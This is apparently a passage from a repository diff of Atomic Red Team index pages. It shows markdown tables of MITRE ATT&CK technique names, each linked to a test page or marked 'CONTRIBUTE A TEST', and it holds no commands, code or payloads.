| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Content Injection](../../T1659/T1659.md) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [System Service Discovery](../../T1007/T1007.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Content Injection](../../T1659/T1659.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -31,7 +31,7 @@
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
@@ -40,7 +40,7 @@
| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | [System Time Discovery](../../T1124/T1124.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | | Junk Code Insertion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
atomics/Indexes/Matrices/matrix.md
+10 -10
View File
@@ -3,19 +3,19 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | [Remote Services:VNC](../../T1021.005/T1021.005.md) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Container and Resource Discovery](../../T1613/T1613.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Resolution: Domain Generation Algorithms](../../T1568.002/T1568.002.md) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lifecycle-Triggered Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Replication Through Removable Media](../../T1091/T1091.md) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Group Policy Discovery](../../T1615/T1615.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SMS Pumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Supply Chain Compromise](../../T1195/T1195.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Device Driver Discovery](../../T1652/T1652.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [External Remote Services](../../T1133/T1133.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Content Injection](../../T1659/T1659.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | Stored Data Manipulation [CONTRIBUTE A 